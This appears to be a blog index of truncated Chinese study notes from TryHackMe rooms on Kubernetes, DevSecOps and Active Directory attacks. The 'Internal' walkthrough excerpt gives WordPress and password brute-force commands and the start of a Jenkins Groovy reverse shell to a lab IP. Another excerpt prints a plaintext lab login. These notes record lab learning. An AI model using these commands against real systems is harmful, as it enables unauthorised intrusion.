Python Basics
空内容不做多余描述
Python for Pentesters
没意义
Intro to Kubernetes Kubernetes
k8s 是 container orchestration system 容器编排系统 Pod Pod是k8s中创建和管理的最小可部署单元 可以视为一组或者多个容器,共享存储和网络资源,就像它们在同一台机器上一样,同时保持一定程度的隔离 Pod 在 Kubernetes 中被视为一个复制单元;如果需要扩大工作负载,您将增加运行的 Pod 数量 Nodes 节点 应用程序在容器内,容器在pod内,pod在节点上运行 节点可以是虚拟机或者物理机 如果应用程序在放置在 Pod 中的容器中运行,则节点包含运行 Pod 所需的所有服务 Cluster 集群是一组节点 Control Plane 组件通信 The Lay of the Land 命名空间Namespaces 命名空间用于隔离单个集群中的资源组,资源在命名空间内必须唯一命名,但相同的资源名称可以在不同的命名空间中使用 副本集ReplicaSet Kubernetes 中的 ReplicaSet 维护一组副本 pod,并且可以保证 x 个相同 pod 的可用性 部署Deployments 部署用于定义所需的状态。一旦定义了所需状态 ...
Introduction to DevSecOps
Developer Operations Waterfall Model 如果有缺陷和错误.不好处理 Agile Model Individuals and interactions over processes and tools 流程和工具上的个体和交互 Working software over comprehensive documentation 工作软件胜过全面的文档 Customer collaboration over contract negotiation 客户协作胜过合同谈判 Responding to change vs following a plan 响应变化与遵循计划 好熟悉的闭环 DevOps 通过使用集成和自动化将参与项目的所有团队的魔力结合在一起来实现这一点。有了这些成分,您就可以跨所有部门(QA+系统管理员+开发人员)进行交叉集成。例如,确保开发人员现在可以参与部署,系统管理员现在可以编写脚本,QA 可以找出如何修复缺陷而不是不断测试功能。通过引入自动化和系统集成,这些工程师现在可以始终拥有相同的可见性并进行相应的交互 几个部分 CI/ ...
Active Directory Basics
Active Directory 凭据存储在active directory 负责运行AD的是Domain Controller AD DS 任何Windows域核心都是AD DS 服务充当目录,其中包含网络上存在的所有“对象”的信息。在 AD 支持的众多对象中,我们有用户、组、机器、打印机、共享等 User people:用户 service:如IIS或MSSQL Machine:计算机帐户本身是指定计算机上的本地管理员,除了计算机本身之外,通常任何人都不应访问它们,但与任何其他帐户一样,如果您有密码,则可以使用它来登录,计算机帐户名称是计算机的名称,后跟美元符号。例如,名为 DC01 的计算机将具有一个名为 DC01$ 的计算机帐户 Security Groups Domain Admins:此组的用户对整个域具有管理权限。默认情况下,他们可以管理域上的任何计算机,包括 DC Server Operators:此组中的用户可以管理域控制器。他们无法更改任何管理组成员身份 Backup Operators:允许此组中的用户访问任何文件,而忽略其权限。它们用于在计算机上执行数 ...
Breaching Active Directory
NTLM Authenticated Services NTLM 身份验证服务 LDAP Bind Credentials LDAP 绑定凭据 Authentication Relays 身份验证中继 Microsoft Deployment Toolkit Microsoft 部署工具包 Configuration Files 配置文件 开打 先改配置文件 原来的 # Generated by NetworkManagersearch localdomainnameserver 10.211.55.1 改完后sudo systemctl restart networking.service cat /etc/resolv.conf# Generated by NetworkManagersearch localdomain za.tryhackme.comnameserver 10.200.80.101nameserver 10.211.55.1# Shorten name resolution timeouts to 1 secondoptions timeout:1# Onl ...
Enumerating Active Directory
The AD snap-ins of the Microsoft Management Console. Microsoft 管理控制台的 AD 管理单元。 The net commands of Command Prompt. 命令提示符的 net 命令。 The AD-RSAT cmdlets of PowerShell. PowerShell 的 AD-RSAT cmdlet。 Bloodhound. 猎犬。 Credential Injection 一个工具 runas.exe /netonly /user:<domain>\<username> cmd.exe /netonly - 由于我们未加入域,因此我们希望加载用于网络身份验证的凭据,但不对域控制器进行身份验证。因此,在计算机上本地执行的命令将在标准 Windows 帐户的上下文中运行,但任何网络连接都将使用此处指定的帐户进行。 /user - 在这里,我们提供域和用户名的详细信息。使用完全限定域名 (FQDN) 而不仅仅是域的 NetBIOS 名称始终是一个安全的选择,因为 ...
Lateral Movement and Pivoting
ssh joe.mccarthy@za.tryhackme.com@thmjmp2.za.tryhackme.com Motorcycles1986 Moving Through the Network Spawning Processes Remotely Psexec TCP/445 Requires the account to be an administrator 要求帐户是管理员 流程 | | | 1. Upload psexecsvc.exe via ADMIN$ share ====> | | |[attacker] | 2. Create and execute psexec service ========> | [target] | ...
Exploiting Active Directory
AD Delegation AD 委派 Forcing Authentication Relays 强制身份验证中继 Group Policy Objects 组策略对象 Targeting AD Users 定位 AD 用户 Domain Trusts 域信任 Silver and Golden Tickets 白银票据,黄金票据 Exploiting Permission Delegation 权限委派 想象一下,我们为一个拥有 50000 名员工的组织工作。由于我们关心安全性,因此只有三个用户有权访问 DA 凭据。这三个用户不可能处理用户的所有请求,例如重置密码。使用委派,我们可以将强制更改用户密码的权限委派给支持团队,这意味着他们现在拥有此特定功能的委派权限。原则上,为了保证授权的安全,应遵循最小特权原则。 Permission Delegation 权限委派 权限委派攻击通常称为基于 ACL 的攻击。AD 允许管理员配置填充任意访问控制列表 (DACL) 的访问控制条目 (ACE),因此称为基于 ACL 的攻击。几乎任何 AD 对象都可以使用 ACE 进行保护,然后 A ...
Persisting Active Directory
最后一个了吧 通过凭据实现持久化 DC Sync 每个域控制器都运行一个称为知识一致性检查器 (KCC) 的进程。KCC 为 AD 林生成复制拓扑,并通过远程过程调用 (RPC) 自动连接到其他域控制器以同步信息。这包括更新的信息(如用户的新密码)和新对象(如创建新用户时的信息)。这就是为什么在更改密码后,您通常必须等待几分钟才能进行身份验证的原因,因为发生密码更改的 DC 可能与您要进行身份验证的 DC 不同 如果我们有权访问具有域复制权限的帐户,则可以进行 DC 同步攻击以从 DC 获取凭据 我们应该尝试通过如下凭据来持久化: Credentials that have local administrator rights on several machines. Usually, organisations have a group or two with local admin rights on almost all computers. These groups are typically divided into one for workstations and one ...
Internal
WordPress 爆破密码 wpscan --url http://internal.thm/wordpress -U admin -P /usr/share/wordlists/rockyou.txt 这速度… 直接看wp得了 登录上后反弹个shell opt目录下有用户密码,ssh上去 ss一下 ffuf -request [file name] -request-proto http -w /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt filename是抓包的获得的文件,好好好 Manage Jenkins -> Tools and Actions->Script Console String host="10.17.6.173";int port=10002;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(tr ...
Buffer Overflow Prep
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.111.252 /workarea 额,太卡了,哥们不打这个,以后再说
avatar
dionysus
我醉欲眠卿且去
此心安处
公告